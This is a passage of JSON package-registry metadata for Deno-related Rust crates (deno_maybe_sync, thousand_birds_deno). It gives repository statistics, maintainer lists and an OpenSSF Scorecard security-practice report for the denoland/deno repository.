s/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-09-07T01:53:11.056Z","dependent_packages_count":0,"downloads":454024,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":94.57982777392854,"dependent_repos_count":20.37612590319707,"dependent_packages_count":26.975155894288825,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":47.31036985713814},"purl":"pkg:cargo/deno_maybe_sync","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_maybe_sync","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_maybe_sync","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_maybe_sync/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-09-06T13:00:35.403Z","issues_count":6650,"pull_requests_count":9667,"avg_time_to_close_issue":17138573.200682055,"avg_time_to_close_pull_request":1530522.5908357133,"issues_closed_count":3810,"pull_requests_closed_count":8052,"pull_request_authors_count":589,"issue_authors_count":2489,"avg_comments_per_issue":2.5046616541353384,"avg_comments_per_pull_request":0.7208027309403124,"merged_pull_requests_count":7030,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":673,"past_year_pull_requests_count":1190,"past_year_avg_time_to_close_issue":1344289.2103004293,"past_year_avg_time_to_close_pull_request":1305317.8687782804,"past_year_issues_closed_count":233,"past_year_pull_requests_closed_count":663,"past_year_pull_request_authors_count":190,"past_year_issue_authors_count":373,"past_year_avg_comments_per_issue":1.2332838038632987,"past_year_avg_comments_per_pull_request":1.134453781512605,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":2,"past_year_merged_pull_requests_count":496,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1803,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1731,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":285,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":268,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":149,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":396,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":183,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"crowlKats","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"devsnek","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_maybe_sync/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_maybe_sync/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_maybe_sync/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_maybe_sync/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_maybe_sync/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_maybe_sync/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2025-08-21T09:51:51.037Z","updated_at":"2025-08-21T09:51:51.037Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2025-08-19T20:30:20.369Z","updated_at":"2025-08-19T20:30:20.369Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":10958372,"name":"thousand_birds_deno","ecosystem":"cargo","description":"Provides the deno executable","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":1,"first_release_published_at":"2024-10-09T05:13:20.863Z","latest_release_published_at":"2024-10-09T05:13:20.863Z","latest_release_number":"1.46.3","last_synced_at":"2026-09-07T22:55:17.484Z","created_at":"2024-10-09T05:29:36.402Z","updated_at":"2026-09-07T22:55:17.485Z","registry_url":"https://crates.io/crates/thousand_birds_deno/","install_command":"cargo install thousand_birds_deno","documentation_url":"https://docs.rs/thousand_birds_deno/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-09-04T18:13:25.000Z","size":249845,"stargazers_count":108384,"open_issues_count":1549,"forks_count":6373,"subscribers_count":1430,"default_branch":"main","last_synced_at":"2026-09-06T18:12:48.927Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-09-06T18:00:40.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is 